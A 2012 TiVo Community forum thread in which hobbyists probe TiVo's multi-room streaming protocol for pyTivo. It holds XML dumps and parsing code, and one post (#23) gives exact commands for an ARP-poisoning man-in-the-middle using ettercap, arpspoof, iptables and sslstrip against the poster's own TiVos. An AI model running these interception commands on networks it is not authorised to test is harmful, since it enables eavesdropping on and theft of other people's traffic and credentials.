TiVo Community
Old 01-13-2012, 11:03 PM   #1
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
No Streaming (MRS) Discovery thread?

I am surprised we haven't seen an MRS discovery thread similar to the iPad thread. I would love to see MRS from the server integrated into pytivo!

Just trying a friendly nudge...

I do realize that this may not be as easy to discover.
__________________
TiVo S2 (Retired)
TiVo Series 3 (Sold)
TiVo HD (Sold)
TiVo Premier (2 TB Upgrade)
TiVo Roamio Plus
TiVo Mini
iPad TiVo app
TiVo Stream (Sold)
Personal Video Share powered by PyTiVo
Old 01-14-2012, 12:00 PM   #2
puffdaddy
Registered User
 
Join Date: Mar 2006
Posts: 295
What were you looking to accomplish?

*Edit: saw that you wanted to have pytivo serve up MRS. I can't say for sure, but drawing an analogy to the original MRV introduced back in sw 4.0+, the reversing done there (which ultimately led to the creation of "tivoserver") required hacked units (both for the reversing process as well as to use tivoserver to transfer shows), so that wouldn't bode well. That said, it would be quite snazzy to have pytivo allow MRS access to its videos.*

After streaming a video, you can simply pull the drives from the MRS client and server units to look through their logs to find the request URL to initiate the stream.

IIRC, the URL was just a suffix permutation of the MRV URLs, but I can't recall if the stream setup first required a mutual certificate authentication or not. Any such authentication (if present) plus the stream encryption means there's little that can be done, unless you have a way to crack those.

Last edited by puffdaddy : 01-14-2012 at 12:07 PM. Reason: read original post more closely
Old 01-14-2012, 12:22 PM   #3
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
Quote:
mutual certificate authentication
I suspect this is correct. As I said, I suspect this is a lot easier said than done.

It was fun to follow the iPad discovery thread and I was surprised that we didn't see a similar thread evaluating some of the new functionality.

I suppose it might be happening in the shadows - or - it might just be a whole different animal and not as discoverable.

Either way - have I said that I love pyTiVo!
Old 01-14-2012, 12:24 PM   #4
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
Well, I don't have 20.2 yet. Even then, I only have one Premiere.

Of course, on the extreme end of optimism, it's possible that implementing streaming will be as simple as adding "<StreamingPermission>Yes</StreamingPermission>" to the container XML.
Old 01-14-2012, 01:04 PM   #5
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
Well, I suppose I will just have to be patient!

Thanks for all the work wmcbrine - it is appreciated.

Last edited by bradleys : 01-14-2012 at 05:00 PM.
Old 01-16-2012, 03:39 PM   #6
gonzotek
tivo_xml developer
 
Join Date: Sep 2004
Location: Outside Phildadelphia
Posts: 2,233
Quote:
Originally Posted by wmcbrine
Of course, on the extreme end of optimism, it's possible that implementing streaming will be as simple as adding "<StreamingPermission>Yes</StreamingPermission>" to the container XML.
Just tried that, after modifying your latest commit to add the tag, it's easy to see that pyTiVo is definitely sending the StreamingPermission tag in the right place (correctly CamelCased), but no change on the TiVo. I also noticed the TiVo sends some new stuff for QueryContainer:
Code:
<?xml version="1.0" encoding="utf-8"?>
<TiVoContainer xmlns="http://www.tivo.com/developer/calypso-protocol-1.6/">
  <Details>
    <ContentType>x-tivo-container/tivo-server</ContentType>
    <SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
    <Title>Mercury</Title>
    <TotalItems>2</TotalItems>
  </Details>
  <ItemStart>0</ItemStart>
  <ItemCount>2</ItemCount>
  <Item>
    <Details>
      <ContentType>x-tivo-container/tivo-videos</ContentType>
      <SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
      <Title>Mercury</Title>
      <UniqueId>Mercury</UniqueId>
    </Details>
    <Links>
      <Content>
        <Url>https://192.168.1.42:443/TiVoConnect?Command=QueryContainer&amp;Container=%2FNowPlaying</Url>
        <ContentType>x-tivo-container/tivo-videos</ContentType>
      </Content>
    </Links>
  </Item>
  <Item>
    <Details>
      <ContentType>x-tivo-container/tivo-videostream</ContentType>
      <SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
      <Title>Mercury</Title>
      <UniqueId>Mercury</UniqueId>
    </Details>
    <Links>
      <Content>
        <Url>https://192.168.1.42:443/TiVoConnect?Command=QueryContainer&amp;Container=%2FNowPlaying</Url>
        <ContentType>x-tivo-container/tivo-videostream</ContentType>
      </Content>
    </Links>
  </Item>
</TiVoContainer>
So I also tried hacking the root template to send an extra Item with a 'x-tivo-container/tivo-videostream' ContentType and with the UniqueId set to the same as the Title, but still no change. Everything looks correctly formatted, and pytivo still functions without complaint fine for push and pull transfers.

Haven't had the time to play more than that.
__________________
Follow @pytivo on Twitter for project updates and more!
A Web app for Roku Remote Control
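A field-by-field comparison of the two root items in the response quoted above, as an added example that is not part of the original post or of pyTivo: it parses the XML with Python's standard library and shows that the tivo-videostream item differs from the tivo-videos item only in its content types. The function and dictionary key names are this example's own.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

# Namespace declared on <TiVoContainer> in the quoted response.
NS = {"t": "http://www.tivo.com/developer/calypso-protocol-1.6/"}

# The root QueryContainer response from the post, embedded so this runs offline.
ROOT_CONTAINER = b"""<?xml version="1.0" encoding="utf-8"?>
<TiVoContainer xmlns="http://www.tivo.com/developer/calypso-protocol-1.6/">
  <Details>
    <ContentType>x-tivo-container/tivo-server</ContentType>
    <SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
    <Title>Mercury</Title>
    <TotalItems>2</TotalItems>
  </Details>
  <ItemStart>0</ItemStart>
  <ItemCount>2</ItemCount>
  <Item>
    <Details>
      <ContentType>x-tivo-container/tivo-videos</ContentType>
      <SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
      <Title>Mercury</Title>
      <UniqueId>Mercury</UniqueId>
    </Details>
    <Links>
      <Content>
        <Url>https://192.168.1.42:443/TiVoConnect?Command=QueryContainer&amp;Container=%2FNowPlaying</Url>
        <ContentType>x-tivo-container/tivo-videos</ContentType>
      </Content>
    </Links>
  </Item>
  <Item>
    <Details>
      <ContentType>x-tivo-container/tivo-videostream</ContentType>
      <SourceFormat>x-tivo-container/tivo-dvr</SourceFormat>
      <Title>Mercury</Title>
      <UniqueId>Mercury</UniqueId>
    </Details>
    <Links>
      <Content>
        <Url>https://192.168.1.42:443/TiVoConnect?Command=QueryContainer&amp;Container=%2FNowPlaying</Url>
        <ContentType>x-tivo-container/tivo-videostream</ContentType>
      </Content>
    </Links>
  </Item>
</TiVoContainer>"""


def parse_items(xml_bytes):
    """Return one flat dict per <Item> in a TiVoContainer document."""
    root = ET.fromstring(xml_bytes)
    items = []
    for item in root.findall("t:Item", NS):
        url = item.findtext("t:Links/t:Content/t:Url", default="", namespaces=NS)
        parts = urlsplit(url)
        query = parse_qs(parts.query)  # also decodes %2F to "/"
        items.append({
            "ContentType": item.findtext("t:Details/t:ContentType", namespaces=NS),
            "SourceFormat": item.findtext("t:Details/t:SourceFormat", namespaces=NS),
            "Title": item.findtext("t:Details/t:Title", namespaces=NS),
            "UniqueId": item.findtext("t:Details/t:UniqueId", namespaces=NS),
            "LinkContentType": item.findtext(
                "t:Links/t:Content/t:ContentType", namespaces=NS),
            "Scheme": parts.scheme,
            "Port": parts.port,
            "Command": query.get("Command", [None])[0],
            "Container": query.get("Container", [None])[0],
        })
    return items


def differing_fields(a, b):
    """Names of the fields whose values differ between two parsed items."""
    return sorted(key for key in a if a[key] != b.get(key))


def streaming_items(items):
    """Items advertised with the new tivo-videostream content type."""
    return [i for i in items if i["ContentType"].endswith("/tivo-videostream")]


if __name__ == "__main__":
    videos, stream = parse_items(ROOT_CONTAINER)
    print("fields that differ:", differing_fields(videos, stream))
    print("stream item points at:", stream["Command"], stream["Container"])
```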
Old 01-16-2012, 07:37 PM   #7
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
As is the norm for TiVo these days the entire MRS communication between TiVos is SSL encrypted, so packet sniffing MRS communication didn't yield anything useful for me (unlike MRV which did show useful info in the past).
__________________
Roamio Pro, Elite, Premiere
Cox - Motorola CableCards & TAs
Slingbox 350 via TiVo Mini & TiVo Stream for remote viewing

Old 01-17-2012, 12:24 AM   #8
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
Gotta get me some MITM for that.

The annoying thing for me right now is that I can't even get my Premiere to accept a transport-stream .TiVo file (from the same unit) via pyTivo. Same file via TiVo Desktop, no problem. I've got the TiVo to request the file from pyTivo, but as soon as the file starts to transfer, the TiVo drops the connection. I've copied (almost) all the TD behavior I can see by hitting it with a browser, and clearly it's not enough.

But, I digress.
Old 01-17-2012, 01:20 AM   #9
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Not sure how one would MITM easily with both sides of the communications being TiVos. Guess you would have to set Gateway for both TiVo network setups to go through a computer implementing MITM instead of a router.
Old 01-18-2012, 01:22 AM   #10
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
Quote:
Originally Posted by wmcbrine
The annoying thing for me right now is that I can't even get my Premiere to accept a transport-stream .TiVo file (from the same unit) via pyTivo.
Figured it out.

80+ Mbps, here we come.
Old 01-18-2012, 09:58 AM   #11
bradleys
It'll be fine....
 
Join Date: Oct 2007
Posts: 2,124
Now the fun begins!
Old 01-18-2012, 10:04 AM   #12
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by wmcbrine
Figured it out.

80+ Mbps, here we come.
Does mpeg2 Transport Stream container with H.264 video work as well?
Old 01-18-2012, 04:09 PM   #13
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
So far no, it transfers but I get a blank screen. This is with 14.9.
Old 01-18-2012, 04:40 PM   #14
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by wmcbrine
So far no, it transfers but I get a blank screen. This is with 14.9.
Will be interesting to see if 20.2 works any differently. With 20.2 I noticed that choosing secondary audio (SAP) from the Info screen for TV recordings now actually works. Also txporter recently discovered that mp4 with H.264 and multiple audio streams also allows you to switch audio streams. i.e. If you want to make a video that plays on a portable player that requires 2-channel AAC but also plays on a TiVo with the original 6-channel AC3 now it's possible to do so. (maybe that already worked before 14.9/20.2 but I'm not sure). It also looks like TiVo decoder actively looks for Dolby audio stream as first choice regardless if it's the 1st or 2nd audio stream.

The interesting thing about TS container with H.264 would be to eliminate the need for MOOV atom nonsense that mp4 container requires which would also open up possibility/option for pyTivo to transcode to H.264 instead of mpeg2.
Old 01-18-2012, 07:26 PM   #15
gonzotek
tivo_xml developer
 
Join Date: Sep 2004
Location: Outside Phildadelphia
Posts: 2,233
Quote:
Originally Posted by moyekj
Will be interesting to see if 20.2 works any differently. With 20.2 I noticed that choosing secondary audio (SAP) from the Info screen for TV recordings now actually works. Also txporter recently discovered that mp4 with H.264 and multiple audio streams also allows you to switch audio streams. i.e. If you want to make a video that plays on a portable player that requires 2-channel AAC but also plays on a TiVo with the original 6-channel AC3 now it's possible to do so. (maybe that already worked before 14.9/20.2 but I'm not sure). It also looks like TiVo decoder actively looks for Dolby audio stream as first choice regardless if it's the 1st or 2nd audio stream.

The interesting thing about TS container with H.264 would be to eliminate the need for MOOV atom nonsense that mp4 container requires which would also open up possibility/option for pyTivo to transcode to H.264 instead of mpeg2.
That's interesting about the multi-audio streams. Now I have to do some tests and see if I can come up with a handbrake or ffmpeg recipe that produces a file both the Roku and TiVo will accept and play.

If we get streaming enabled from pytivo, I'll be happy with mpeg2. It's faster/easier to encode when using general purpose cpus. I guess if I wanted to store content on the box, h.264 would still be preferable.
Old 01-19-2012, 11:38 AM   #16
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
My triumph was pitifully short-lived. 20.2 appears to throttle all connections, in and out, to around 20 Mbps. Perversely, MPEG-2 transfers are now faster than MP4, and program streams are the fastest of all (though not by much), turning everything on its head.

They also broke the transfer of many metadata items, even via real .TiVo files. Apart from all that, it doesn't seem much different (for pyTivo's purposes) from 14.9 -- same kinds of weirdness with transport streams, MP4 pulls still look like they're going to work but don't, etc.
Last edited by wmcbrine : 01-19-2012 at 01:15 PM.
Old 01-19-2012, 01:17 PM   #17
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
OK, I'm an idiot. Or, put it down to being tired... I was testing from my laptop, which was connected via G. That's where the throttle was.

Metadata is still broken, though.
Old 01-26-2012, 10:58 PM   #18
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
Naive attempt:

Code:
http://downloadurl&Format=x-tivo-container/tivo-videostream
does not work. I didn't expect it to, but I thought it was worth a try, since I just got streaming enabled.

In case you're wondering, x-tivo-container/tivo-videostream comes from QueryFormats:

Code:
<TiVoFormats>
  <Format>
    <ContentType>video/x-tivo-mpeg</ContentType>
    <Description/>
  </Format>
  <Format>
    <ContentType>video/x-tivo-mpeg-ts</ContentType>
    <Description/>
  </Format>
  <Format>
    <ContentType>x-tivo-container/tivo-videostream</ContentType>
    <Description/>
  </Format>
  <Format>
    <ContentType>video/x-tivo-raw-tts</ContentType>
    <Description/>
  </Format>
</TiVoFormats>
It's the only new one. Interesting that it's "x-tivo-container" where the others are "video".
Old 02-03-2012, 09:46 PM   #19
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
There's a Zeroconf announcement of a service associated with streaming. It looks exactly like the "tivo-videos" service, except that it's called "tivo-videostream" (other fields are identical AFAICT).

I tried having pyTivo put out an announcement for tivo-videostream, while adding to QueryFormats and QueryContainer as outlined above. So far, no luck.
Old 02-03-2012, 09:58 PM   #20
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
I assume you already have <StreamingPermission>Yes</StreamingPermission> added to the XML container for pyTivo video shares right?
Old 02-03-2012, 10:02 PM   #21
wmcbrine
Resistance Useless
 
Join Date: Aug 2003
Posts: 9,115
That was included under "adding to ... QueryContainer as outlined above".
Old 02-09-2012, 04:28 PM   #22
gonzotek
tivo_xml developer
 
Join Date: Sep 2004
Location: Outside Phildadelphia
Posts: 2,233
Quote:
Originally Posted by wmcbrine
Gotta get me some MITM for that.
I don't know if this'll be useful to you for Tivo/pyTivo hacking or not, but thought I'd share on the off-chance it could be.
http://mitmproxy.org/
Quote:
mitmproxy is an SSL-capable man-in-the-middle HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

mitmdump is the command-line version of mitmproxy, with the same functionality but without the frills. Think tcpdump for HTTP.

Intercept and modify HTTP traffic on the fly
Save HTTP conversations for later replay and analysis
Replay both HTTP clients and servers
Make scripted changes to HTTP traffic using Python
SSL interception certs generated on the fly

Old 02-20-2012, 12:13 PM   #23
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
My MITM attempt

I gave MITM a serious go over the weekend. Ultimately I was not able to decrypt SSL traffic as intended but I post in detail the steps I took in the hopes of encouraging others to give it a shot and perhaps find a way to get it working. I think I'm close but perhaps need a different tool for SSL stripping.

NOTE: One of the most important things I learned is it's not necessary to have a hub to monitor your network traffic, since ARP poisoning can take care of making sure you can see all your switched activity from your PC.

NOTE: I also don't have linux installed at home so I used a linux installation on a thumb drive (4GB thumb drive in my case). The nice thing about that approach is if you currently have only Windows or Mac you can just install and run everything from a thumb drive without interfering at all with your Windows or Mac installation. It's better if you have a more permanent linux installation to play with, but steps below don't require that.

STEP 1 - INSTALL LINUX ON A THUMB DRIVE
(You can use Ubuntu if you want, but that means some hacking tools are missing that you would have to install. Backtrack 5 has most of the hacking tools needed already installed)
a. Download Backtrack Linux iso file from:
Code:
 http://www.backtrack-linux.org/downloads/
Release = BackTrack 5
WM Flavor = GNOME
Arch = 32 bit
Image = ISO
Download = Direct

(This gets you iso file BT5-GNOME-32.iso)

b. Download and install UNetbootin (to install iso file to thumb drive)
Code:
http://unetbootin.sourceforge.net/
c. Install iso on thumb drive.
1. Insert your thumb drive in USB slot
2. Start UNetbootin and select Diskimage = ISO and browse to the BT5-GNOME-32.iso
3. Leave Space used to preserve... as 0 unless you are using Ubuntu ISO instead
4. Make sure Type = USB drive and Drive is the correct thumb drive volume

STEP 2 - BOOT LINUX FROM THUMB DRIVE
a. Make sure thumb drive is in a USB slot and reboot/start your PC
b. During boot up go to your boot options screen. For my laptop running Windows I press Esc during bootup and then F9 to choose which device to boot from. Here I then choose the thumb drive

STEP 3 - GET LINUX UP AND RUNNING WITH NETWORKING ENABLED
a. At prompt type the following to start x-windows:
startx
b. Start networking as follows:
Applications-Internet-Wicd Network Manager
- If you have wired network then simply choose connect on 1st entry.
- If you have wireless network then choose "Properties" and in "Key" field enter your WPA2 password (or whichever protection you are using). Then click on "Connect".

STEP 4 - DOWNLOAD AND INSTALL sslstrip
a. Start firefox: Applications-Internet-Firefox
b. Download sslstrip from:
Code:
 http://www.thoughtcrime.org/software/sslstrip/
c. Simply choose to save sslstrip-0.9.tar.gz to root folder
d. Unpack and install it:
gunzip -c sslstrip-0.9.tar.gz | tar xvf -
cd sslstrip-0.9
python setup.py install
cd ..

STEP 5 - COLLECT NECESSARY NETWORK INFORMATION
a. Determine the IP addresses of your Premieres on your home network. For me this is:
192.168.10.196 = LR Premiere (This is my MRS host)
192.168.10.199 = Premiere (This is my MRS client)

b. Determine name of your network interface device.
If using wired this is "eth0"
If using wireless this is "wlan0"

STEP 6a - SETUP AND RUN THE MITM ATTACK USING ettercap
a. Start a new shell by clicking on the terminal icon to the right of System
b. Install ettercap:
apt-get install ettercap
c. Edit the /etc/etter.conf file. I usually use "vi" as editor but you can use xedit graphical editor:
xedit /etc/etter.conf
d. Scroll down to section entitled "Linux" and then uncomment (remove the leading #) from the following 2 entries under "# if you use iptables"
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
e. Click on Save and then Quit
f. Now we are ready to start ettercap (Use wlan0 or eth0 interface according to wireless or wired, and replace the IP names with your Premiere IPs):
ettercap -Tqdi wlan0 -w etter.pcap -M arp:remote /192.168.10.196/ /192.168.10.199/
g. The traffic is now logged to etter.pcap file which can then be viewed using wireshark:
wireshark etter.pcap
NOTE: Stop ettercap by pressing 'q' in the ettercap window.

STEP 6b - MORE COMPLEX ALTERNATIVE TO 6a: SETUP AND RUN THE MITM ATTACK USING arpspoof & sslstrip
a. Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

b. Use iptables to setup forwarding of port 443 traffic to port 8080:
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

c. arp poison traffic on your network so that it routes through your PC. Specifically I choose to poison my 2 Premieres:
1. Start a new shell by clicking on the terminal icon to the right of System
2. Execute following command in that shell (use eth0 if wired, wlan0 if wireless which is my case):
arpspoof -i wlan0 -t 192.168.10.196 192.168.10.199
(Obviously substitute the 2 IPs above for whatever your 2 Premiere IPs are)

d. Start sslstrip monitoring port 8080 and logging to file strip.log:
1. Start a new shell by clicking on the terminal icon to the right of System
2. Execute following command in that shell:
sslstrip -a -k -l 8080 -w strip.log
3. Now on your client Premiere browse to your other Premiere and push inside of show details of your host Premiere. That is enough to generate traffic on port 443 (without actually starting MRS).
4. If you want to monitor the strip.log file you can open another shell and execute the following:
tail -f strip.log

NOTES:
- Ideally if this worked properly at this point strip.log would contain unencrypted traffic.
- You can use the following iptables command to actually check if any traffic is being port forwarded:
iptables -t nat -L -v
(Even though for me this shows there is some traffic on port 443 sslstrip is not doing anything with it)
- Use Ctrl-C to stop arpspoof and/or sslstrip
- If instead of 443 I repeat the above with port 80 then I do see all the traffic using sslstrip (kind of interesting to see). In order to remove forwarding you simply use -D instead of -A in the iptables command. i.e. To remove the 443 forwarding:
iptables -t nat -D PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
Then to add port 80 forwarding instead use:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

VIEWING TRAFFIC WITH WIRESHARK
After you setup the arpspoof poisoning you can actually start wireshark to monitor network traffic as follows:
1. From command prompt start wireshark:
wireshark
2. Choose the appropriate network interface, in my case wlan0
3. Confirm there is a bunch of traffic generated between your 2 Premiere units when browsing remote Premiere and pushing inside of show details. Specifically you should look for SSLv3 and "Server Hello" which is the SSL handshaking that happens when you push into show details on remote Premiere.
4. NOTE: Click on the red 'x' to stop capturing network traffic.

In my case the arp poisoning is working fine since I can see all the traffic using wireshark. But unfortunately sslstrip is not doing what I expected which is to decrypt https traffic. I think this is probably because it was designed for web based ssl decryption (clients using web browsers) as opposed to SSL between 2 local LAN machines.

FINAL NOTE
If using Backtrack 5 thumb drive remember that because there is no perpetual file store defined as soon as you shutdown then any and all changes you made to the linux installation will be lost and need to be repeated. I made a script that does most of the above tasks for me so I don't have to repeat every time. I save the script as part of an email attachment so I can get to the script through Firefox while in Backtrack 5. i.e. A permanent linux install would be better if you have an available machine to do it or if you setup dual boot or VMWare instead.
Last edited by moyekj : 02-26-2012 at 02:41 PM. Reason: Added more formatting for readability and more notes
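What the handshake seen in the capture tells a passive observer, as an added example that is not part of the original post: sslstrip rewrites plaintext HTTP, so a connection that opens with an SSL record gives it nothing to act on, while the record and handshake headers (unencrypted in SSLv3 and TLS up to 1.2) still show whether the server sends a CertificateRequest, which is how mutual certificate authentication, raised earlier in the thread, appears on the wire. The byte strings are constructed samples and the function names are this example's own.

```python
import struct

# Record and handshake type numbers shared by SSLv3 and TLS 1.0-1.2.
RECORD_TYPES = {20: "change_cipher_spec", 21: "alert",
                22: "handshake", 23: "application_data"}
HANDSHAKE_TYPES = {1: "client_hello", 2: "server_hello", 11: "certificate",
                   12: "server_key_exchange", 13: "certificate_request",
                   14: "server_hello_done", 15: "certificate_verify",
                   16: "client_key_exchange", 20: "finished"}
VERSIONS = {(3, 0): "SSLv3", (3, 1): "TLSv1.0",
            (3, 2): "TLSv1.1", (3, 3): "TLSv1.2"}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ")


def classify_first_bytes(data):
    """Say whether a connection opens with plaintext HTTP or an SSL/TLS record."""
    if data.startswith(HTTP_METHODS):
        return "http"
    if len(data) >= 3 and data[0] in RECORD_TYPES and (data[1], data[2]) in VERSIONS:
        return "tls"
    return "unknown"


def iter_records(stream):
    """Yield (type_name, version_name, payload) for each complete record."""
    pos = 0
    while pos + 5 <= len(stream):
        rtype, major, minor, length = struct.unpack("!BBBH", stream[pos:pos + 5])
        if rtype not in RECORD_TYPES or (major, minor) not in VERSIONS:
            raise ValueError("not an SSL/TLS record at offset %d" % pos)
        payload = stream[pos + 5:pos + 5 + length]
        if len(payload) < length:
            break  # truncated capture: stop at the last complete record
        yield RECORD_TYPES[rtype], VERSIONS[(major, minor)], payload
        pos += 5 + length


def handshake_messages(stream):
    """List the cleartext handshake message names sent in one direction."""
    buf = b""
    for rtype, _version, payload in iter_records(stream):
        if rtype == "change_cipher_spec":
            break  # everything this side sends afterwards is encrypted
        if rtype == "handshake":
            buf += payload  # messages may be coalesced or split across records
    names, pos = [], 0
    while pos + 4 <= len(buf):
        length = int.from_bytes(buf[pos + 1:pos + 4], "big")
        if pos + 4 + length > len(buf):
            break
        names.append(HANDSHAKE_TYPES.get(buf[pos], "unknown(%d)" % buf[pos]))
        pos += 4 + length
    return names


def requests_client_certificate(server_stream):
    """True if the server's handshake flight includes a CertificateRequest."""
    return "certificate_request" in handshake_messages(server_stream)


def _record(rtype, payload, version=(3, 0)):
    return struct.pack("!BBBH", rtype, version[0], version[1], len(payload)) + payload


def _handshake(msg_type, body):
    return bytes([msg_type]) + len(body).to_bytes(3, "big") + body


# Constructed samples: bodies are zero-filled, only the headers are meaningful.
HTTP_OPEN = b"GET /TiVoConnect?Command=QueryContainer HTTP/1.1\r\n"
CLIENT_OPEN = _record(22, _handshake(1, b"\x00" * 41))
SERVER_FLIGHT = (
    _record(22, _handshake(2, b"\x00" * 38))        # ServerHello
    + _record(22, _handshake(11, b"\x00" * 10)      # Certificate
              + _handshake(13, b"\x00" * 6)         # CertificateRequest
              + _handshake(14, b""))                # ServerHelloDone
    + _record(20, b"\x01")                          # ChangeCipherSpec
    + _record(22, b"\xaa" * 40)                     # encrypted Finished
)

if __name__ == "__main__":
    print(classify_first_bytes(HTTP_OPEN), classify_first_bytes(CLIENT_OPEN))
    print(handshake_messages(SERVER_FLIGHT))
    print("client certificate requested:", requests_client_certificate(SERVER_FLIGHT))
```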
Old 02-20-2012, 06:21 PM   #24
tomhorsley
Registered User
 
Join Date: Jul 2010
Posts: 717
Don't know how many Live USB installations this works for, but with a Fedora USB,
you can make the usb stick with an "overlay" storage (whatever that means :-), but
the upshot is that you actually get a modifiable USB installation so you can
add packages, etc and they will be there the next time you plug in a boot from
the USB.
Old 02-20-2012, 07:13 PM   #25
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by tomhorsley
Don't know how many Live USB installations this works for, but with a Fedora USB,
you can make the usb stick with an "overlay" storage (whatever that means :-), but
the upshot is that you actually get a modifiable USB installation so you can
add packages, etc and they will be there the next time you plug in a boot from
the USB.
Yes, for Ubuntu you can do that as well (define persistence space for a thumb drive installation that survives reboots). I actually started with and have another USB stick with persistent Ubuntu on it. It was just easier to summarize with Backtrack 5 because it required minimal amount of extra package installations to get going. Pretty much any recent linux installation should work though. Note also that if it was just ARP poisoning necessary then something like Cain & Abel on Windows works fine for that task. However I didn't find much in the way of transparent proxy + ssl decryption tools available for Windows so it became clear pretty quickly Linux was the way to go, plus for me I like command line tools better anyway so Linux was a better fit. Actually I'm open to anything that will just work at this point - don't really care if it's Windows or Linux.

As a side note doing sniffing on port 80 actually provides a lot of insight on how HME applications (for Showcases menus and in TiVo My Shows screen). With help of some DNS spoofing it may be possible to get your own HME applications showing up on My Shows screen which would be interesting, but I don't want to be side-tracked at the moment.
Last edited by moyekj : 02-20-2012 at 07:19 PM.
Old 02-20-2012, 10:58 PM   #26
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
FYI I got ettercap running properly, but unfortunately it also doesn't seem to decrypt SSL properly for the TiVo communication either. I updated the instructions above indicating how to use ettercap which is actually simpler than arpspoof + sslstrip.
Old 02-21-2012, 08:19 AM   #27
reneg
Registered User
 
Join Date: Jun 2002
Posts: 463
Interested novice here and certainly no security expert. Doesn't sslstrip present http to one side of the conversation? Is it possible that tivo(s) only accepts https (tls+http)?

I'm guessing a successful trace will involve spoofing a cert and then feeding that cert into wireshark to decrypt the data stream.

Cheering you on from the sideline.
Old 02-21-2012, 08:31 PM   #28
moyekj
Registered User
 
Join Date: Jan 2006
Location: Mission Viejo, CA
Posts: 9,260
Quote:
Originally Posted by reneg
Interested novice here and certainly no security expert. Doesn't sslstrip present http to one side of the conversation? Is it possible that tivo(s) only accepts https (tls+http)?
Well in my example, theoretically because of my iptables rule all port 443 traffic is redirected to port 8080 which sslstrip is then processing and passing off to the actual destination. The traffic is reaching my Premiere so it looks like sslstrip is just leaving everything alone and just passing traffic through. If it were actually downgrading to http as it's supposed to and the destination TiVo didn't like that then there would be a handshaking failure and I wouldn't be able to get to show details on the host TiVo. I think part of the complication here is that the host TiVo is using port 443 (192.168.10.196 in my example) while the client TiVo is using a different port (not a specific port but varies with each attempt).

Quote:
I'm guessing a successful trace will involve spoofing a cert and then feeding that cert into wireshark to decrypt the data stream.
Cheering you on from the sideline.
Well the problem is we don't have the TiVo certificate which is needed for this and if TiVo won't accept fake certificates then none of these MITM attacks are going to work from my limited understanding.

As an example I tried using similar techniques to see if I could sniff out my login and password for mail.yahoo.com but yahoo is smart enough to recognize it's being compromised and login wouldn't work while I had port redirection turned on.
moyekj is offline   Reply With Quote
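The handshake-failure reasoning in the post above, seen from the receiving side. This is an added example, not code from the thread: it shows how a TLS-only listener or a network monitor can tell a TLS ClientHello from the plaintext HTTP that a stripped connection would carry. The function names and the sample byte strings are constructed for illustration.

```python
import struct

HTTP_METHODS = (b"GET ", b"POST ", b"PUT ", b"HEAD ", b"DELETE ", b"OPTIONS ")
MAX_RECORD_LEN = 2 ** 14  # largest plaintext TLS record payload


def classify_first_bytes(data: bytes) -> str:
    """Classify the first bytes a listener on a TLS port receives."""
    if data.startswith(HTTP_METHODS):
        return "plaintext-http"
    if len(data) < 6:
        return "incomplete"
    # TLS record header: content type (1), version (2), length (2)
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    if ctype != 0x16 or major != 0x03 or minor > 0x04:
        return "unknown"
    if not 0 < length <= MAX_RECORD_LEN:
        return "unknown"
    # First byte of the handshake message: 0x01 is ClientHello
    return "tls-client-hello" if data[5] == 0x01 else "unknown"


def flag_plaintext_on_tls_port(connections):
    """Return labels of connections to port 443 that did not start with TLS."""
    return [label for label, port, first in connections
            if port == 443 and classify_first_bytes(first) == "plaintext-http"]


# Constructed sample data, not captured from any TiVo.
SAMPLES = [
    ("normal client", 443, bytes.fromhex("16030100c8010000c40303")),
    ("stripped client", 443,
     b"GET /constructed-path HTTP/1.1\r\nHost: host.example\r\n\r\n"),
    ("web request", 80, b"GET / HTTP/1.1\r\n\r\n"),
    ("mid-stream data", 443, bytes.fromhex("170303002000112233")),
]

if __name__ == "__main__":
    for label, port, first in SAMPLES:
        print(f"{label:16} port {port:<4} {classify_first_bytes(first)}")
    print("flagged:", flag_plaintext_on_tls_port(SAMPLES))
```

A listener that only speaks TLS treats the "plaintext-http" case as a malformed record and aborts the handshake, so a monitor that flags it is seeing either a misconfigured client or a downgrade attempt.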
Old 02-21-2012, 10:39 PM   #29
reneg
Registered User
 
Join Date: Jun 2002
Posts: 463
Quote:
Originally Posted by moyekj View Post
